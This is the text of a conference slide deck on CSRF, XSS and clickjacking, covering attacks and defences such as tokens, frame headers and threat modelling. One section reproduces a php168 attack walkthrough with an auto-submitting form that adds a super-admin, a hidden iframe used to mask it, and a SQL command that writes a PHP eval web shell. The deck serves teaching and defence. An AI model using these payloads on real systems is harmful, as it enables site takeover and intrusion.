Upload
leora
View
83
Download
0
Embed Size (px)
DESCRIPTION
TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n. 夏克強 麟瑞科技 資深技術顧問 CISSP, CHFI, CEH. Why Web application Vulnerable. Web Servers. Application Servers. Database Servers. Operating Systems. Operating Systems. Operating Systems. Network. - PowerPoint PPT Presentation
Citation preview
TAIS 台灣學術資訊安全國際研討會CSRF( 跨站偽冒請求 ) 攻擊的分析與防護
Cross-Site Request Forgery Threat and Mitigation
夏克強麟瑞科技 資深技術顧問CISSP, CHFI, CEH
Why Web application Vulnerable
Improved commercial or in-house application access to information means improved access for hackers?
個人資料交易紀錄客戶資料
Database Servers
Customer InfoBusiness DataTransaction Info
網站應用程式 (Web AP)• 未上線的急於上線• 已上線的年代久遠
75% 攻擊集中於此75% 攻擊集中於此
Network
OperatingSystems
DatabaseServers
OperatingSystems
ApplicationServers
OperatingSystems
WebServers
網路防火牆
IDSIPS
SQL InjectionParameter TamperingXSS, .., etc.
Mapping from 2007 to 2010 Top 10
+
+
--
=
=
OWASP TOP TEN
Cybercrime 威脅 Cyber pickpocketing
BEBLOH, where the malware went beyond “traditional” keylogging by not only stealing credit card information but also accessing the account and transferring funds to another account
Cross-Site Scripting
Reflected XSS, Stored XSS (aka Persistent XSS)Samy WormWeb sites compromised: FBI.gov, CNN.com,
Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes
Top vulnerable weakness in recent yearsWeb sites vulnerable to XSS: searching
page, forum, comment, login page..
Cross-Site Scripting attacksHoaxSteal user’s session Id and cookiesAlmost full control to your browsers such as port scan, keylogger and send requests on behave of the client
Stored Cross-Site Scripting
Application with stored XSS vulnerability
3
2
Attacker sets the trap – update my profile
Attacker enters a malicious script into a web page that stores the data on the server
1
Victim views page – sees attacker profile
Script silently sends attacker Victim’s session cookie
Script runs inside victim’s browser with full access to the DOM and cookies
Custom Code
Accou
nts
Fin
an
ce
Ad
min
istr
ati
on
Tra
nsacti
on
sC
om
mu
nic
ati
on
Kn
ow
led
ge
Mg
mt
E-C
om
merc
eB
us.
Fu
ncti
on
s
Stored & Reflected XSS
Stored XSS guaranteed that victim users will be already accessing the application at the time that the attack strikes
Reflected XSS may try to engineer this situation by persuading the user to log in
Reflected XSS must use some means of inducing users to visit attacker’s crafted URL
Phishing attack by offering a link to his own malicious web server would be suspected as a scam The requirement for stored XSS is avoided
Stored XSS(aka Persistent XSS) is more serious than reflected XSS
Clickjacking是攻擊者試圖綁架使用者的滑鼠點擊,讓使用者在不知情的情況下點擊攻擊者精心設計的連結或按鈕
Clickjacking可視為是一種進階的網路釣魚手法Clickjacking (Session-Riding) 與 CSRF 相似,都是讓使用者在 不自覺的狀況上當Clickjacking 與 CSRF結合 對攻擊有加乘效果
Clickjacking( 點擊綁架 )
使用 Firefox 的 Noscript 的 ClearClick功能阻擋 iframe的執行 (NoScript)或停用 Javascript
Frame busting(也就是 anti-framing) for your own sites<script>if (top != self) top.location = location</script>
IE8 针對 Clickjacking增加 對 Clickjacking攻擊的防禦功能
X-FRAME-OPTIONS: DENYX-FRAME-OPTIONS: SAMEORIGIN
Clickjacking 防禦
Forced Browsing
<html><body>空白頁<iframe src=http://www.google.com.tw/search?hl=zh-TW &q=taiwan+taipei height=0 width=0></body></html>
應用 : 廣告收入技巧 : 數以千計的人點擊 , 來自不同 IP 地址 , 可以規避檢查機制
Cross-Site Request Forgery
CSRF example: 進一步
引誘你點選連結
假如你訪問的購物網站網址為:http://www.hacker.net ,你購買了一個產品,購物網站參數為:http://www.hacker.net/buy.php?item=computer&quantity=1這是一個正常的 HTTP 請求,商品名稱是電腦 computer ,購買數量是 1 ,網站會將所買的商品與數量記錄在用戶的帳戶內。如果黑客知道了 http://www.hacker.net 購物網站的操作流程,他就可以偽造一個類似的 HTTP 請求: http://www.hacker.net/buy.php?item=computer&quantity=1000 ,商品名稱是 computer ,而購買數量卻是 1000 。如果目標用戶在網站登錄期間不小心訪問了這個鏈接,那麼在他的帳戶內就是會有一條記錄是購買 1000 台的 computer
php168 之 CSRF 攻擊
加入網站管理員的頁面為 :
http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember
摘錄自 www.haik8.com
<form name="form1" method="post" action="index.php?lfj=member&action=addmember"> <tr class="head"> <td colspan="2"> 添加新用户 </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 帐号 :</td> <td width="63%"> <input type="text" name="postdb[username]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 密码 :</td> <td width="63%"> <input type="password" name="postdb[passwd]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 重复密码 :</td><td width="63%"> <input type="password" name="postdb[passwd2]"> </td> </tr>
<tr bgcolor="#FFFFFF">
摘錄自 www.haik8.com
php168 之 CSRF 攻擊
<td width="37%"> 所属用户组 :<span help=1> 只有超级管理员与创建人才能添加新的超级管理员 , 只有超级管理员与创始人及前台管理员才能添加新的前台管理员 </span></td> <td width="63%"> <select name='postdb[groupid]' ><option value='' selected> 现有用户组 </option> <option value='2' > 游客组</option> <option value='3' > 超级管理员 </option> <option value='4' > 前台管理员 </option> <option value=''>--+ 以上是系统组,以下是会员组 +--</option> <option value='8' > 普通会员 </option> <option value='9' > 高级会员 </option> </select> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> 邮箱 :</td> <td width="63%"> <input type="text" name="postdb[email]"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="37%"> </td> <td width="63%"> <input type="submit" name="Submit" value=" 提交 "> </td> </tr> </form>
摘錄自www.haik8.com
php168 之 CSRF 攻擊
摘錄自 www.haik8.com
駭客修改程式碼 , 修改完的程式碼如下 : <html><body onload="document.form1.submit()"> <form name="form1" method="post" action="http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember"> <input type="hidden" name="postdb[username]" value=' 樱花浪子 '> <input type="hidden" name="postdb[passwd]" value='nohack'> <input type="hidden" name="postdb[passwd2]" value='nohack'> <select name='postdb[groupid]' ><option value='3' selected> </form> </body></html>
php168 之 CSRF 攻擊
摘錄自 www.haik8.com
這樣我們得到路徑為: http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm ,這樣管理員在登錄前後台的情況下訪問了這個頁面就會添加一個用戶名為“櫻花浪子”、密碼為“ nohack” 的超級管理員
php168 之 CSRF 攻擊
摘錄自 www.haik8.com
但是這樣的話會顯示添加管理員成功的提示,我們要做的隱藏點,來做一個圖片木馬<html><body><iframe src=http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm width=0 height=0></iframe> <img src=/Article/UploadPic/2010-4/2010417144022600.jpg></img> </body> <html> 得到路徑為 special/5_20090426220451_PYwLh.jpg ,http://192.168.0.3/php168/upload_files/ special/5_20090426220451_PYwLh.jpg
php168 之 CSRF 攻擊
摘錄自 www.haik8.com
執行:“ SELECT ‘<?php @eval($_POST[cmd]);?>’ into outfile ‘C:\ \AppServ\\www\\php168\\nohack.php’”
php168 之 CSRF 攻擊
摘錄自 www.haik8.com
檢查一下 , 顯示已經注入了 !!
php168 之 CSRF 攻擊
行事曆系統範例http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308
CSRF, Referrer 與 X Headers 範例
強迫 victim 讀取行事曆特定日期Countermeasures against CSRF
Clickjacking 與 CSRF 有加乘效果使用 iframe Opacity=30
<a href=‘http://egw.ringline.com.tw/index.php?menuaction= calendar.calendar_uiviews.day&date=20101016> 請點我可打折 </a>
CSRF PreventionsInsert custom random tokens into every form and URL
Store a single token in the session and add it to all forms and linksHidden Field: <input name="token"
value="687965fdfaew87agrde" type="hidden"/>Single use URL: /accounts/687965fdfaew87agrdeForm Token: /accounts?auth=687965fdfaew87agrde …
For sensitive data or value transactions, re-authenticate or use transaction signing
Verify Referrer header, but XHR can break it.Verify X-header. It is more effective than Referrer header due to
SOP.legal example:GET /auth/[email protected] HTTP/1.1Host: social.siteX-CSRF: 1Illegal example:<html><img src=http://social.site/auth/update_profile.cgi?
[email protected]></html>
GET /auth/[email protected] HTTP/1.1Host: social.site
Ensure that there are no XSS vulnerabilities in your application
Ratproxy
Semi-auto web application securityassessment tool for XSS, CRSF
Findings should be validated by manualtesting and analysis where appropriate
Not all of the issues reported necessarily correspond to actual security flaws
Microsoft Threat Modeling
Denial of service
Elevation of privilege
Spoofing identity
Information disclosure
Repudiability
Tampering with data(integrity)
Threats
Affected users
Discoverability
Damagepotential
Exploitability
Reproducibility
Rating
SSSS
TTTT
RRRR
IIII
DDDD
EEEE
DDDD
AAAA EEEE
RRRR
DDDD
Microsoft Threat Modeling
1. Identify assets
2. Create an architecture overview3. Decompose the application
4. Identify the threats
5. Document the threats
6. Rate the threats
OWASP Risk Methodology
CSRF Rating Example
CVSS (Metrics View)
Obstacle for Code Review(or Scanners)
5
4
3
2
1
• Can’t provide immediate protection• Web applications, change frequently. In many cases the application can change before a full review cycle has been completed• The source code is not readily “available” or “understood”• With enough MIS staffs and time to do re-coding ?
• Manual code fixes are only as good as the developer
• Attacks, (again, especially Web attacks), also change frequently. • No multiple services correlation capability• Can’t track the accurate user who launches the attacks and the attack patterns
Continued
10
9
8
7
6• Suitable for developing phase, not for production phase• Suitable for developing phase, not for design phase (only resolved by Risk Analysis)
• Slow response to compliance requirements
• Can’t protect web servers and backend database servers
• No web site cloaking such as anti Google hack
• Can’t provide additional insight into those that are requiring writing to the database or are accessed by transaction only
5
4
3
2
1 • Suitable for production phase, not for developing phase
• Suitable for developing phase, not for design phase (only resolved by Risk Analysis) • Lack of Logical flaws detection (only resolved by human code review)• Applications do something insecure
• Can’t accurately correct application flaws
• WAF could go down (fail-open or fail-close)
Obstacle for WAFs